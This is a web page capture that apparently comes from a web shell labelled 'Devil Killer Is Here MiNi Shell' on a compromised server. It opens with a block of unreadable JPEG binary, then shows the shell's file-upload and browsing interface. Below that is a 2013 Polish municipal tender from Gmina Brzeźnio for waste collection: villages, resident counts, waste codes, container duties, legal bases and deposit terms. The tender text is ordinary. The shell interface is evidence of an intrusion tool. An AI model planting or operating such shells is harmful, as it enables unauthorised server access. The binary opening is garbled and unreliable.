JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130515/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130515/189312-N-2013.html

<p class="kh_header"><b>Brzeźnio: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH  Z TERENU GMINY BRZEŹNIO</b><br>
<b>Numer ogłoszenia: 189312 - 2013; data zamieszczenia: 15.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brzeźnio , ul. Wspólna 44, 98-275 Brzeźnio, woj. łódzkie, tel. 043 8203026, 043 8203024, faks 043 8203671.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brzeznio.finn.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH  Z TERENU GMINY BRZEŹNIO.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia
1.1. Ogólny opis przedmiotu zamówienia.
1.1.1 Przedmiotem Zamówienia jest usługa polegająca na odbieraniu i zagospodarowaniu odpadów komunalnych pochodzących od właścicieli nieruchomości, na których zamieszkują mieszkańcy oraz od właścicieli nieruchomości, na których nie zamieszkują mieszkańcy,                    a powstają odpady komunalne z terenu gminy Brzeźnio oraz wyposażenie wszystkich właścicieli nieruchomości w pojemniki na odpady zgodnie z Regulaminem utrzymania czystości i porządku (stanowiącym Załącznik nr 11 do siwz).

1.1.2  Kody CPV:
90500000-2 - Usługi związane z odpadami
90513100-7 - Usługi wywozu odpadów pochodzących z gospodarstw domowych.
90533000-2 - Usługi zagospodarowania odpadów

1.2.Informacje ogólne mające wpływ na wycenę zamówienia:
1.2.1	W ramach zamówienia Wykonawca zobowiązany jest odbierać i zagospodarować  odpady komunalne ze wszystkich nieruchomości zamieszkałych oraz niezamieszkałych na terenie Gminy Brzeźnio.
1.2.2	Powierzchnia gminy:  128,73 km2 . 
1.2.3  Dane dotyczące liczby  mieszkańców zameldowanych na pobyt stały i czasowy oraz szacowanej  liczby  gospodarstw domowych wg stanu na dzień 31.12.2012 r.: 
Lp.	miejscowość	liczba mieszkańców 	szacunkowa liczba gospodarstw domowych	w tym zabudowa wielorodzinna: 
1	Barczew 	265	67	
2	Bronisławów	348	86	 
3	Brzeźnio	731	180	 
4	Dębołęka	510	135	 4 bloki nr 97, 103, 105, 109 (44 rodziny) pojemniki indywidualnie dla każdego gospodarstwa domowego 
5	Gęsina	71	17	 
6	Gozdy	201	47	 1 budynek komunalny - Gozdy 40, (5 rodzin) pojemniki indywidualnie dla każdego gospodarstwa domowego
7	Kliczków Mały	361	93	 
8	Kliczków Wielki	144	33	 
9	Kliczków-Kolonia	180	43	
10	Krzaki	269	51	 
11	Lipno	52	19	 
12	Nowa Wieś	331	80	 
13	Ostrów	451	110	 
14	Podcabaje 	132	29	 
15	Próba	114	29	 
16	Pustelnik	118	31	 
17	Pyszków	293	71	 1 budynek komunalny - Pyszków 53, (7 rodzin) pojemniki indywidualnie dla każdego gospodarstwa domowego                                  
18	Rembów	185	40	 
19	Ruszków	112	30	 
20	Rybnik	114	27	 
21	Rydzew	43	18	 
22	Stefanów Barczewski Drugi	126	25	 
23	Stefanów Barczewski Pierwszy	121	28	 
24	Stefanów Ruszkowski	154	45	 
25	Tumidaj	176	47	 
26	Wierzbowa	85	16	 
27	Wola Brzeźniowska	100	27	 
28	Zapole	440	111	 
29	Złotowizna	84	21	 
		6341	1556	

1.2.4. Załącznikami nr 8 i nr 12 do SIWZ jest wykaz wszystkich nieruchomości zamieszkałych na terenie gminy Brzeźnio i liczby zameldowanych w nich osób oraz wykaz nieruchomości niezamieszkałych. Wykaz załączony jest pomocniczo w celu oszacowania zakresu zamówienia.   W okresie realizacji zamówienia dane objęte wykazem mogą ulec zmianie. Nie wpłynie to na cenę zamówienia, która w okresie realizacji umowy jest niezmienna.

1.2.5	Ilości odpadów  zebranych w 2012 r. na terenie gminy przez firmy odbierające odpady:
Lp	kod odpadu	Ilość Mg
1	200301	330,3
2	150102	9,9
3	150106	26,7
4	150107	100,8
5	200201	0,8
6	150101	4,0
7	150104	0,8
8	160103	1,6
9	200123	0,1
10	200134	0,2
11	200307	10,3
		
 	Razem	485,5

Wskazane ilości odebranych w 2012 r. odpadów są podane jedynie pomocniczo w celu ułatwienia Wykonawcom wyceny zamówienia. 
1.2.6	Ilość umów na wywóz odpadów zawartych przez mieszkańców wg stanu na dzień 31.12.2012 r. wynosiła 1173 szt . Ilość umów na wywóz odpadów zawartych przez przedsiębiorców według stanu na dzień 31.12.2012 r. wynosiła 75 szt.
1.2.7	Na dzień ogłoszenia postępowania przetargowego według złożonych przez mieszkańców deklaracji o wysokości opłaty za gospodarowanie odpadami komunalnymi                   95% zadeklarowało segregację odpadów.

1.3	W ramach zamówienia Wykonawca zobowiązany jest odbierać  i zagospodarować następujące rodzaje odpadów:

1)	z zamieszkałych i nie zamieszkałych nieruchomości: 
a)	niesegregowane (zmieszane) odpady komunalne o kodzie   20 03 01,
b)	segregowane odpady komunalne z podziałem na następujące frakcje:
- papier i tektura, metal, tworzywa sztuczne, opakowania wielomateriałowe (odpady suche) o kodzie 15 01 06
- opakowania ze szkła o kodzie: 15 01 07,
2)	z Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK) pozostałe odpady komunalne:
a)	przeterminowane leki o kodzie 20 01 32
b)	zużyte baterie i akumulatory o kodzie 20 01 34
c)	zużyty sprzęt elektryczny i elektroniczny o kodach:20 01 23, 20 01 35, 20 01 36
d)	odpady wielkogabarytowe o kodzie 20 03 07
e)	odpady budowlano-rozbiórkowe  o kodach z grupy 17
f)	        zużyte opony o kodzie 16 01 03
g)	odpady ulegające biodegradacji (zielone) o kodzie 20 02 01
h)	opakowania ze szkła o kodzie 15 01 07
i)	opakowania z tworzyw sztucznych o kodzie 15 01 02
j)	opakowania z papieru i tektury o kodzie 15 01 01
k)	chemikalia: 20 01 13, 20 01 15, 20 01 27, 20 01 14, 20 01 19, 20 01 29
l)	opakowania z metali o kodzie 15 01 04
ł)	opakowania wielomateriałowe o kodzie 15 01 05



1.4. Wyposażenie Punktu Selektywnego Zbierania Odpadów Komunalnych (PSZOK).
1.4.1 W ramach zamówienia w miejscu wyznaczonym przez Zamawiającego (utwardzony teren ul. Sieradzka 8, 98-275 Brzeźnio) Wykonawca wyposaży PSZOK w odpowiednie pojemniki tak aby zapewnić prawidłową segregację odpadów zgodnie z uchwałą  Rady Gminy Brzeźnio w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz  uchwałą  Rady Brzeźnio w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Brzeźnio. Wykonawca wyposaży Punkt Selektywnego Zbierania Odpadów Komunalnych  w pojemniki:
a)	przeterminowane leki - pojemnik o pojemności 0,12 m3,
b)	chemikalia (farby, rozpuszczalniki, oleje odpadowe) - pojemnik o pojemności 0,24 m3,
c)	zużyte baterie i akumulatory - pojemnik o pojemności 0,24 m3,
d)	zużyty sprzęt elektryczny i elektroniczny - kontener o pojemności 1,1 m3,
e)	odpady wielkogabarytowe - wyznaczone miejsce do magazynowania odpadów,
f)	odpady budowlano - rozbiórkowe - kontener o pojemności 7 m3,
g)	zużyte opony - wyznaczone miejsce do magazynowania odpadów 
h)	odpady zielone - pojemnik o pojemności 1,1m3,
i)	opakowania ze szkła - pojemnik o pojemności 1,5 m3 np. typ IGLOO,
j)	opakowania z tworzyw sztucznych - pojemnik o pojemności 2,5 m3 np. typ SIATKA,
k)	opakowania z papieru i tektury - pojemnik o pojemności 0,24m3,
l)	opakowania z metali - pojemnik od 0,24 m3,
ł)	opakowania wielomateriałowe - pojemnik o pojemności 1,1 m3 .

1.4.2 Za zorganizowanie i obsługę PSZOK odpowiada Zamawiający.
1.4.3 PSZOK będzie odbierał odpady od mieszkańców raz w tygodniu w każdą sobotę                   w godz. 730 - 1530 w okresie od 1 lipca do 31 października 2013 r. oraz od 1.04.2014 do 30.06.2014 r.
1.4.4 Do  PSZOK mieszkańcy mogą oddawać odpady zgodnie z uchwałą  Rady Gminy Brzeźnio w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów oraz  uchwałą  Rady Gminy Brzeźnio w sprawie regulaminu utrzymania czystości i porządku na terenie Gminy Brzeźnio.
1.4.5 Zamawiający zastrzega sobie prawo do zwiększenia bądź zmniejszenia ilości pojemników jeśli będzie to wynikać z uzasadnionej potrzeby ich regulacji. 

1.5.  Obowiązek zapewnienia pojemników
1.5.1. Na czas realizacji zamówienia Wykonawca zobowiązany jest do nieodpłatnego zapewnienia posiadaczom nieruchomości zamieszkałych i niezamieszkałych pojemników na odpady przystosowanych do opróżniania mechanicznego o pojemnościach  i właściwościach określonych w:
- uchwale  Rady Gminy Brzeźnio w sprawie sposobu i zakresu świadczenia usług  w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów - załącznik nr 10 do siwz.
- oraz  uchwale  Rady Gminy Brzeźnio w sprawie regulaminu utrzymania czystości                           i porządku na terenie Gminy Brzeźnio - załącznik nr 11 do siwz.
Przekazywane  pojemniki powinny być nowe lub używane, czyste, estetyczne, spełniające obowiązujące wymogi sanitarne i techniczne. 
1.5.2. Pojemniki będą przekazywane przez Wykonawcę mieszkańcom na zasadach określonych w uchwale Rady Gminy Brzeźnio, w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości                               i zagospodarowania tych odpadów. Ilości i objętości pojemników dla nieruchomości winny być dopasowane do ilości osób zamieszkałych na niej. Szczegółowy wykaz nieruchomości zamieszkałych i niezamieszkałych zostanie przekazany Wykonawcy po zawarciu umowy i będzie na bieżąco aktualizowany przez Zamawiającego. Wykonawca w terminie 1 m-ca od daty przekazania mu aktualizacji wykazu  zobowiązany będzie do dokonania wymiany pojemników na posesjach lub  dostarczenia dodatkowych  pojemników  stosownie do wprowadzonych zmian.
1.5.3. Pojemniki będą przez Wykonawcę dostarczane mieszkańcom na posesje  w okresie  od dnia zawarcia umowy  do dnia 30.06.2013 r. W terminie do 30.06.2013 r. wykonawca zobowiązany jest przedłożyć Zamawiającemu raport o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach na dzień 30.06.2013 r. wraz                   z informacją o posesjach, do których pojemników nie dostarczono (z podaniem przyczyny niedostarczenia).
1.5.4. Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia pojemników z winy wykonawcy, wykonawca zobowiązany będzie do wymiany uszkodzonego pojemnika na własny koszt.

1.6. Częstotliwość i zasady odbioru i wywozu odpadów.
1.6.1. Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował                                     z częstotliwością  i na   zasadach określonych w uchwale  Rady Gminy Brzeźnio w sprawie sposobu i zakresu świadczenia usług w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości i zagospodarowania tych odpadów stanowi załącznik nr 10 do SIWZ.
1.6.2. Odbiór i wywóz odpadów komunalnych wykonawca będzie realizował                                 w poszczególnych miejscowościach z uwzględnieniem, iż odbiór powinien odbywać się                 w ten sam dzień roboczy tygodnia. W sytuacji, gdy dzień wywozu jest ustawowo dniem wolnym od pracy (święto), wywóz odpadów nastąpi w pierwszym dniu roboczym po dniu wolnym. Odstępstwa od wyżej wymienionych zasad muszą na bieżąco być uzgadniane                    z Zamawiającym.
1.6.3. Wykonawca zobowiązany jest do opracowania i dostarczenia do wszystkich nieruchomości zamieszkałych harmonogramu wywozu odpadów do dnia 30.06.2013 r. Harmonogram powinien dotyczyć odbioru odpadów komunalnych zmieszanych oraz gromadzonych selektywnie na podstawie, którego będzie realizowany odbiór                                 (z uwzględnieniem całego okresu realizacji przedmiotu zamówienia) wraz z określeniem kolejności miejscowości, z których odbierane będą odpady. Harmonogram musi uwzględnić częstotliwość odbioru. 
1.6.4. Harmonogram musi być wykonany na papierze utwardzonym formatu A5 lub A6, 
w kolorze, przejrzysty i czytelny. Musi zawierać nazwę Gmina Brzeźnio wraz                             z danymi teleadresowymi oraz nazwę firmy odbierającej odpady, instrukcję segregacji odpadów i konsekwencje w przypadku nieprzestrzegania zasad użytkowania. Wzór harmonogramu musi być uzgodniony z Zamawiającym. Zakazuje się umieszczania na harmonogramie reklam. Mogą znaleźć się wyłącznie informacje z zakresu edukacji ekologicznej.
1.6.5. Podczas realizacji umowy niedopuszczalne jest mieszanie selektywnie zebranych odpadów komunalnych z odpadami niesegregowanymi.
1.6.6. Wykonawca zobowiązany jest do  sukcesywnego wywozu odpadów z PSZOK tak aby zapewnić  możliwość ciągłego odbioru odpadów od mieszkańców. Zamawiający powiadomi Wykonawcę co najmniej jeden dzień wcześniej o konieczności odbioru odpadów. 
1.6.7. Odbiór i wywóz odpadów będzie odbywał się ściśle według harmonogramu,        sporządzonego przez Wykonawcę i zatwierdzonego przez Zamawiającego. Odbiór musi się odbywać w dni robocze od poniedziałku do soboty:
- rozpoczęcie: nie wcześniej niż od godz. 6.00,
- zakończenie: nie później niż do godziny 20.00. 
1.6.8. Odbiór odpadów będzie następował  z pojemników wystawionych przez właściciela nieruchomości na zewnątrz posesji, do drogi dojazdowej lub ustawionych 
w pergolach śmietnikowych, do których zapewniony jest swobodny dojazd.
1.6.9. W zakresie odbioru odpadów z nieruchomości o utrudnionym dojeździe Wykonawca może ustalić odrębne terminy wywozu niż dla pozostałych nieruchomości w danej miejscowości.
1.6.10. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym, a Wykonawcą i może polegać 
w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, zastępczych pojemników (np. worków) oraz innych terminów ich odbioru - taki sposób spełnienia świadczenia wynikającego z umowy może  być wykonywany jedynie po uzyskaniu wcześniejszej akceptacji Zamawiającego.
1.6.11. Wykonawca zobowiązany jest do porządkowania terenu zanieczyszczonego odpadami komunalnymi i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w szczególności w trakcie realizacji usługi wywozu oraz kontroli.     



1.7. Kontrola  obowiązku segregowania odpadów.
1.7.1. Wykonawca zobowiązany jest do kontrolowania właścicieli nieruchomości pod kątem wypełniania obowiązku w zakresie selektywnego zbierania odpadów komunalnych oraz niezwłoczne informowanie Zamawiającego o przypadkach niedopełnienia przez właścicieli nieruchomości w/w obowiązku. W przypadku zaistnienia powyższej sytuacji Wykonawca sporządza protokół wraz z dokumentacją fotograficzną, które stanowią dowód nie wywiązania się właściciela nieruchomości z obowiązku prowadzenia segregacji odpadów.
1.7.2. Ponadto w takim przypadku wykonawca umieszcza na pokrywie pojemnika informację ostrzegającą właściciela nieruchomości o stwierdzonych nieprawidłowościach w zakresie przestrzegania obowiązku segregowania odpadów oraz o konsekwencjach, jeśli przypadek ten się powtórzy. Treść informacji musi zostać wcześniej zaakceptowana przez Zamawiajacego.                
1.7.3. O zaistniałej sytuacji wykonawca zawiadamia Zamawiającego drogą elektroniczną, faxem  lub pisemnie, w terminie do 7 dni roboczych. Do zawiadomienia wykonawca dołącza   protokół określający: dzień wywozu, miejscowość, ulicę i numer posesji oraz krótki opis obrazujący podstawę udzielenia ostrzeżenia właścicielowi nieruchomości. Do protokołu zobowiązany jest dołączyć również dokumentację fotograficzną. 

1.8. Wykonawca zobowiązany będzie do prowadzenia i przekazania Zamawiającemu dokumentacji związanej z przedmiotem zamówienia:
1)	 raportu na koniec II kwartału 2013 r. (tj. do 30 czerwca 2013 roku), na koniec IV kwartału 2013 roku i na koniec II kwartału 2014 roku o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach.
2)	 raportów kwartalnych zawierających określenie  ilości i rodzajów przekazywanych                         i odebranych pojemników w danym kwartale (załącznik do faktury).
3)	Sprawozdań, o których mowa w art. 9n ustawy o utrzymaniu czystości i porządku                          w gminach.
4)	 innych informacji na temat odbioru, unieszkodliwiania i segregacji odpadów, jeżeli                        w trakcie realizacji zamówienia Zamawiający nałoży taki obowiązek. Obowiązek ten dotyczyć może jedynie informacji, w posiadaniu których będzie wykonawca.
5)	 jako załączniki do faktury kwartalnej wykonawca załączy karty przekazania odpadów uwzględniające datę, kod, rodzaj, wagę przekazanych odpadów komunalnych do RIPOK. Karty przekazania odpadów, o których mowa w zdaniu poprzednim muszą jednoznacznie stwierdzać, że odpady pochodzą z terenu gminy Brzeźnio.

1.9. Pozostałe obowiązki Wykonawcy:
1.9.1. Wykonawca podczas realizacji przedmiotu umowy zobowiązany jest do osiągnięcia odpowiednich poziomów recyklingu odbieranych odpadów komunalnych zgodnie z art. 3b                 i 3c ustawy o utrzymaniu czystości i porządku w gminach oraz rozporządzeniami wykonawczymi.
1.9.2. Prawidłowe gospodarowanie odebranymi odpadami zgodnie z przepisami prawa obowiązującymi w tym zakresie. 
1.9.3. Przekazywanie odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do właściwej dla regionu II Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych lub, w szczególnych przypadkach, do instalacji przewidzianej do zastępczej obsługi regionu zgodnie z uchwałą w sprawie wykonania Planu Gospodarki Odpadami dla Województwa Łódzkiego.
1.9.4. Przekazywanie selektywne zebranych odpadów komunalnych do instalacji odzysku 
i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami, o której mowa  w art. 17   i 18 ustawy z dn. 14 grudnia 2012 r. o odpadach.
1.9.5. W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi) gdy nie jest możliwa realizacja usługi zgodnie z harmonogramem, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym, a Wykonawcą i może polegać 
w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości, zastępczych pojemników (np. worków) oraz innych terminów ich odbioru - taki sposób spełnienia świadczenia wynikającego z umowy może  być wykonywany jedynie po uzyskaniu wcześniejszej akceptacji Zamawiającego.
1.9.6. Wykonawca zobowiązany jest do posiadania pisemnego potwierdzenia odbioru przez właściciela nieruchomości pojemników i harmonogramu.

1.10. Obowiązujące przepisy prawa.  
 Odbiór odpadów komunalnych wykonawca będzie świadczył zgodnie z obowiązującymi przepisami prawa, w szczególności:
1) Ustawa z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (Dz. U. z 2008 r., Nr 25, poz. 150 - ze zmianami),
2) Ustawa z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. 
z 2012, poz. 391 ze zmianami),
3)  Ustawa z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz.21 z dnia 8 stycznia 2013 r.),
4)  Ustawa z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 - ze zmianami),
5) Ustawa z dnia 29 lipca 2005 o zużytym sprzęcie elektrycznym i elektronicznym (Dz. U. 
z 2005 r. , Nr 180, poz. 1495 - ze zmianami), 
6)  Ustawa z dnia 24 kwietnia 2009 r. o bateriach i akumulatorach (Dz. U. z 2009 r., Nr 79, poz. 666 - ze zmianami),
7) Ustawa z dnia 18 lipca 2001 r. Prawo wodne (Dz. U. z 2012 r. , poz. 145),
8) Rozporządzenie Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie wzoru dokumentów stosowanych na potrzeby ewidencji odpadów (Dz. U. z 2010 r. Nr 249, poz. 1673 - ze zmianami),
9) Rozporządzenie Ministra Środowiska z dnia 8 grudnia 2010 r. w sprawie zakresu informacji oraz wzorów formularzy służących do sporządzania  i przekazywania zbiorowych zestawień danych o odpadach (Dz. U. z 2010 r. , Nr 249, poz.1674 - ze zmianami),
10) Rozporządzenie Ministra Środowiska z dnia 27 września 2001 r. w sprawie katalogu odpadów (Dz. U. z 2001, Nr 112, poz. 1206 - ze zmianami),
11) Rozporządzenie Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012 r. , poz. 645),
12) Rozporządzenie Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r., poz. 630),
13) Rozporządzenie Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji 
przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów (Dz. U. z 2012 r. , poz. 676),
14) obowiązujące na terenie gminy akty prawa miejscowego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających do wysokości 20 % wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.51.31.00-7, 90.53.30.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Ustala się wadium dla całości przedmiotu zamówienia w wysokości:
5 000,00 zł (słownie: pięć tysięcy złotych)
2.	Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
1)	w pieniądzu, przelewem na rachunek bankowy w Banku Spółdzielczy w Sieradzu, O/Brzeźnio: 28 9267 0006 0030 1950 3000 0040 Bank Spółdzielczym 
w Sieradzu, Oddział w Brzeźniu, ul. Wspólna 39, 98-275 Brzeźnio  z adnotacją wadium w postępowaniu: ODBIÓR I ZAGOSPODAROWANIE ODPADÓW KOMUNALNYCH
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -    kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,
3)	w gwarancjach bankowych, 
4)	w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275), w terminie: do dnia składania ofert do godz. 12:00. 
W zakresie pkt. od 2) do 5) Wykonawca zobowiązany jest załączyć oryginalny dokument potwierdzający wniesienie wadium do oferty. 
